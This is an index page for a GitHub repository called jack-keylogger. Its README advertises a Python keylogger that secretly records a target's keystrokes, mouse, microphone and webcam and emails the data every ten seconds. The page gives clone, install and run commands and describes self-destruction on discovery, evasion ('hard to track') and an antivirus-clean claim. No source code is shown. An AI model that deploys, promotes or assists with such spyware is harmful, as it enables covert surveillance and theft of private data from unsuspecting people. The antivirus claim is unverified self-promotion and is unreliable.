Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/krishealty/jack-keylogger
a simple keylogger that records hardware inputs like keyboard, mouse, microphone and webcam and sends it to your e-mail.
https://github.com/krishealty/jack-keylogger
cybersecurity cybersecurity-tools enumeration hacking-tools information-gathering information-retrieval kali-linux kali-scripts keylogger osint osint-tool penetration-testing penetration-testing-tools python python-hacking python-hacking-tools python-tools python3 vulnerability-scanners
Last synced: 22 days ago
JSON representation
a simple keylogger that records hardware inputs like keyboard, mouse, microphone and webcam and sends it to your e-mail.
- Host: GitHub
- URL: https://github.com/krishealty/jack-keylogger
- Owner: krishealty
- License: apache-2.0
- Created: 2024-10-18T10:27:36.000Z (2 months ago)
- Default Branch: main
- Last Pushed: 2024-10-18T10:51:06.000Z (2 months ago)
- Last Synced: 2024-11-24T20:09:00.853Z (28 days ago)
- Topics: cybersecurity, cybersecurity-tools, enumeration, hacking-tools, information-gathering, information-retrieval, kali-linux, kali-scripts, keylogger, osint, osint-tool, penetration-testing, penetration-testing-tools, python, python-hacking, python-hacking-tools, python-tools, python3, vulnerability-scanners
- Language: Python
- Homepage:
- Size: 230 KB
- Stars: 5
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# jack-keylogger
Sends target's hardware data to your email client every 10 seconds (can be changed) and destroys itself if target tries to find the SMTP username and password.## PREREQUISITES
This program supports:
- Windows
- Termux
- Mac os
- LinuxNote: **You need to add your SMTP USERNAME and SMTP PASSWORD of the email client in the file "keylogger.py" before using.** (refer below screenshot)
(you can create an email client from "https://mailtrap.io/" using a temp mail.)
## INSTALLATION
```
git clone https://github.com/krishealty/jack-keylogger.git
``````
cd jack-keylogger
``````
pip install -r requirements.txt
```## USAGE
```
python3 keylogger.py
```## FEATURES
- Get hardware Data from the Target Computer every 10 seconds.
- The program will destroy itself if the target tries to find the email client.
- Hard to track.## ANTIVIRUS TEST
Program is clean, virus free and safe to use.